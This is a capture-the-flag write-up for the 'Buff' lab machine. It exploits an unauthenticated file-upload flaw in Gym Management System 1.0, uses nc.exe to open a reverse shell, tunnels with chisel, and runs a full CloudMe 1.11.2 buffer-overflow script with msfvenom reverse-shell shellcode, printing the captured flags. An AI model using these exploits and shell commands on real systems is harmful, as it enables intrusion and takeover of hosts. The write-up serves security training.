Overview:
The box starts with us finding a Gym Management System web application, and using searchsploit we find there is an Unauthenticated File Upload Vulnerability and we get a shell on the box via a webshell. We find a vulnerable service running locally which has a public exploit available, but to execute it we need python, turns out python is not installed on the box, so we do port forwarding and execute the buffer overflow exploit from our machine.
Reconnaissance
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Nmap 7.80 scan initiated Sun Jul 19 22:49:34 2020 as: nmap -sC -sV -Pn -v -oN nmap_scan 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.35s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n\'s Bro Hut
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 19 22:50:44 2020 -- 1 IP address (1 host up) scanned in 70.49 seconds
Port 8080
Looks like a Gym Website,we find that this website was made using Gym Management Software 1.0
Gym Management System 1.0 Unauthenticated Remote Code Execution
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(sid㉿kali)-[~/…/flags/hackthebox/windows-machines/buff]
└─$ searchsploit gym management
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(sid㉿kali)-[~/…/flags/hackthebox/windows-machines/buff]
└─$ searchsploit -m php/webapps/48506.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(sid㉿kali)-[~/…/flags/hackthebox/windows-machines/buff]
└─$ python 48506.py http://10.10.10.198:8080/ 1 ⨯
/\
/vvvvvvvvvvvv \--------------------------------------,
^^^^^^^^^^^^ /============BOKU======================/
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
C:\xampp\htdocs\gym\upload>
Getting a stabler shell with netcat. Starting a python http server on my machine.
1
2
C:\xampp\htdocs\gym\upload> curl http://10.10.14.3:8000/nc.exe -o nc.exe
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.3 4444 -e powershell.exe
1
2
3
4
┌──(sid㉿kali)-[~/Documents/resources]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.198 - - [22/Nov/2020 10:06:46] "GET /nc.exe HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(sid㉿kali)-[~/Documents/resources]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49681
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\gym\upload> cd c:\users\shaun\desktop
cd c:\users\shaun\desktop
PS C:\users\shaun\desktop> dir
dir
Directory: C:\users\shaun\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 22/11/2020 03:35 34 user.txt
PS C:\users\shaun\desktop> type user.txt
type user.txt
e2c2b4ce173ab870c791be072abcd4b6
PS C:\users\shaun\desktop>
Privilege escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\users\shaun\desktop>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
<snip>
TCP 10.10.10.198:8080 10.10.14.3:50176 ESTABLISHED 2928
TCP 10.10.10.198:49681 10.10.14.3:4444 ESTABLISHED 5492
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 7468
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 8768
TCP [::]:135 [::]:0 LISTENING 944
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 5900
TCP [::]:8080 [::]:0 LISTENING 2928
<snip>
PS C:\users\shaun\desktop>
netstat shows 2 ports are listening on localhost, MySQL on port 3306 and something on port 8888 which has PID=8768.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\users\shaun\desktop> tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
<snip>
svchost.exe 1140 0 1,452 K
cmd.exe 5528 0 500 K
conhost.exe 5672 0 1,276 K
nc.exe 5492 0 4,576 K
powershell.exe 2036 0 34,252 K
cmd.exe 1924 0 3,264 K
conhost.exe 396 0 11,024 K
CloudMe.exe 8768 0 38,628 K
SearchProtocolHost.exe 5516 0 7,816 K
<snip>
The PID of CloudMe.exe is 8768. So we can conclude that CloudMe is running on port 8888. (Since PIDs kept on changing execute netstat -ano and tasklist 2 times consecutively)
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\users\shaun> dir Downloads
dir Downloads
Directory: C:\users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
PS C:\users\shaun>
On googling CloudMe_1112 exploit we find that it is infact vulnerable.
Reading the exploit. We would be needing python and python is not installed on Buff. We will do port forwarding with help of chisel and execute the exploit from our machine. Here is a good article explaining port forwarding via chisel. Downlod chisel from here. Start a python http server and transfer chisel.exe to buff.
Port forwarding
Starting a chisel server on my machine.
1
2
3
4
5
┌──(sid㉿kali)-[~/Documents/resources]
└─$ ./chisel_1.6.0_linux_amd64 server -p 4567 --reverse
2020/11/22 10:59:28 server: Reverse tunnelling enabled
2020/11/22 10:59:28 server: Fingerprint cf:c5:96:ba:73:47:60:48:db:de:7d:23:aa:54:b5:3b
2020/11/22 10:59:28 server: Listening on 0.0.0.0:4567...
Transfer chisel.exe to buff and run it as a client.
1
2
3
4
5
6
PS C:\users\shaun> invoke-webrequest -Uri http://10.10.14.3:8000/chisel.exe -OutFile chisel.exe
PS C:\users\shaun> ./chisel.exe client 10.10.14.3:4567 R:8888:127.0.0.1:8888
./chisel.exe client 10.10.14.3:4567 R:8888:127.0.0.1:8888
2020/11/22 05:33:27 client: Connecting to ws://10.10.14.3:4567
2020/11/22 05:33:28 client: Fingerprint cf:c5:96:ba:73:47:60:48:db:de:7d:23:aa:54:b5:3b
2020/11/22 05:33:29 client: Connected (Latency 255.3366ms)
Modifying the exploit.
We can use msfvenom to generate our payload and get a reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(sid㉿kali)-[/tmp]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=7777 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload = b""
payload += b"\xd9\xee\xd9\x74\x24\xf4\xba\xf4\xf2\xbf\xb8\x5f"
payload += b"\x2b\xc9\xb1\x52\x31\x57\x17\x03\x57\x17\x83\x1b"
payload += b"\x0e\x5d\x4d\x1f\x07\x20\xae\xdf\xd8\x45\x26\x3a"
payload += b"\xe9\x45\x5c\x4f\x5a\x76\x16\x1d\x57\xfd\x7a\xb5"
payload += b"\xec\x73\x53\xba\x45\x39\x85\xf5\x56\x12\xf5\x94"
payload += b"\xd4\x69\x2a\x76\xe4\xa1\x3f\x77\x21\xdf\xb2\x25"
payload += b"\xfa\xab\x61\xd9\x8f\xe6\xb9\x52\xc3\xe7\xb9\x87"
payload += b"\x94\x06\xeb\x16\xae\x50\x2b\x99\x63\xe9\x62\x81"
payload += b"\x60\xd4\x3d\x3a\x52\xa2\xbf\xea\xaa\x4b\x13\xd3"
payload += b"\x02\xbe\x6d\x14\xa4\x21\x18\x6c\xd6\xdc\x1b\xab"
payload += b"\xa4\x3a\xa9\x2f\x0e\xc8\x09\x8b\xae\x1d\xcf\x58"
payload += b"\xbc\xea\x9b\x06\xa1\xed\x48\x3d\xdd\x66\x6f\x91"
payload += b"\x57\x3c\x54\x35\x33\xe6\xf5\x6c\x99\x49\x09\x6e"
payload += b"\x42\x35\xaf\xe5\x6f\x22\xc2\xa4\xe7\x87\xef\x56"
payload += b"\xf8\x8f\x78\x25\xca\x10\xd3\xa1\x66\xd8\xfd\x36"
payload += b"\x88\xf3\xba\xa8\x77\xfc\xba\xe1\xb3\xa8\xea\x99"
payload += b"\x12\xd1\x60\x59\x9a\x04\x26\x09\x34\xf7\x87\xf9"
payload += b"\xf4\xa7\x6f\x13\xfb\x98\x90\x1c\xd1\xb0\x3b\xe7"
payload += b"\xb2\xb4\xb1\xe9\x41\xa1\xc7\xf5\x5b\x50\x41\x13"
payload += b"\x09\x82\x07\x8c\xa6\x3b\x02\x46\x56\xc3\x98\x23"
payload += b"\x58\x4f\x2f\xd4\x17\xb8\x5a\xc6\xc0\x48\x11\xb4"
payload += b"\x47\x56\x8f\xd0\x04\xc5\x54\x20\x42\xf6\xc2\x77"
payload += b"\x03\xc8\x1a\x1d\xb9\x73\xb5\x03\x40\xe5\xfe\x87"
payload += b"\x9f\xd6\x01\x06\x6d\x62\x26\x18\xab\x6b\x62\x4c"
payload += b"\x63\x3a\x3c\x3a\xc5\x94\x8e\x94\x9f\x4b\x59\x70"
payload += b"\x59\xa0\x5a\x06\x66\xed\x2c\xe6\xd7\x58\x69\x19"
payload += b"\xd7\x0c\x7d\x62\x05\xad\x82\xb9\x8d\xdd\xc8\xe3"
payload += b"\xa4\x75\x95\x76\xf5\x1b\x26\xad\x3a\x22\xa5\x47"
payload += b"\xc3\xd1\xb5\x22\xc6\x9e\x71\xdf\xba\x8f\x17\xdf"
payload += b"\x69\xaf\x3d"
Now I will just replace the payload in the exploit with the payload created with msfvenom.
Exploit Script:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=7777 -b '\x00\x0A\x0D' -f python -v payload
payload = b""
payload += b"\xd9\xee\xd9\x74\x24\xf4\xba\xf4\xf2\xbf\xb8\x5f"
payload += b"\x2b\xc9\xb1\x52\x31\x57\x17\x03\x57\x17\x83\x1b"
payload += b"\x0e\x5d\x4d\x1f\x07\x20\xae\xdf\xd8\x45\x26\x3a"
payload += b"\xe9\x45\x5c\x4f\x5a\x76\x16\x1d\x57\xfd\x7a\xb5"
payload += b"\xec\x73\x53\xba\x45\x39\x85\xf5\x56\x12\xf5\x94"
payload += b"\xd4\x69\x2a\x76\xe4\xa1\x3f\x77\x21\xdf\xb2\x25"
payload += b"\xfa\xab\x61\xd9\x8f\xe6\xb9\x52\xc3\xe7\xb9\x87"
payload += b"\x94\x06\xeb\x16\xae\x50\x2b\x99\x63\xe9\x62\x81"
payload += b"\x60\xd4\x3d\x3a\x52\xa2\xbf\xea\xaa\x4b\x13\xd3"
payload += b"\x02\xbe\x6d\x14\xa4\x21\x18\x6c\xd6\xdc\x1b\xab"
payload += b"\xa4\x3a\xa9\x2f\x0e\xc8\x09\x8b\xae\x1d\xcf\x58"
payload += b"\xbc\xea\x9b\x06\xa1\xed\x48\x3d\xdd\x66\x6f\x91"
payload += b"\x57\x3c\x54\x35\x33\xe6\xf5\x6c\x99\x49\x09\x6e"
payload += b"\x42\x35\xaf\xe5\x6f\x22\xc2\xa4\xe7\x87\xef\x56"
payload += b"\xf8\x8f\x78\x25\xca\x10\xd3\xa1\x66\xd8\xfd\x36"
payload += b"\x88\xf3\xba\xa8\x77\xfc\xba\xe1\xb3\xa8\xea\x99"
payload += b"\x12\xd1\x60\x59\x9a\x04\x26\x09\x34\xf7\x87\xf9"
payload += b"\xf4\xa7\x6f\x13\xfb\x98\x90\x1c\xd1\xb0\x3b\xe7"
payload += b"\xb2\xb4\xb1\xe9\x41\xa1\xc7\xf5\x5b\x50\x41\x13"
payload += b"\x09\x82\x07\x8c\xa6\x3b\x02\x46\x56\xc3\x98\x23"
payload += b"\x58\x4f\x2f\xd4\x17\xb8\x5a\xc6\xc0\x48\x11\xb4"
payload += b"\x47\x56\x8f\xd0\x04\xc5\x54\x20\x42\xf6\xc2\x77"
payload += b"\x03\xc8\x1a\x1d\xb9\x73\xb5\x03\x40\xe5\xfe\x87"
payload += b"\x9f\xd6\x01\x06\x6d\x62\x26\x18\xab\x6b\x62\x4c"
payload += b"\x63\x3a\x3c\x3a\xc5\x94\x8e\x94\x9f\x4b\x59\x70"
payload += b"\x59\xa0\x5a\x06\x66\xed\x2c\xe6\xd7\x58\x69\x19"
payload += b"\xd7\x0c\x7d\x62\x05\xad\x82\xb9\x8d\xdd\xc8\xe3"
payload += b"\xa4\x75\x95\x76\xf5\x1b\x26\xad\x3a\x22\xa5\x47"
payload += b"\xc3\xd1\xb5\x22\xc6\x9e\x71\xdf\xba\x8f\x17\xdf"
payload += b"\x69\xaf\x3d"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
I’ll start a netcat lister and run the exploit.
1
2
3
┌──(sid㉿kali)-[~/…/flags/hackthebox/windows-machines/buff]
└─$ python 48389.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(sid㉿kali)-[~]
└─$ rlwrap nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
buff\administrator
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
8052f9f9e0779299f769fe62e29e8336
C:\Windows\system32>
And that was the box, hope you learned something new :D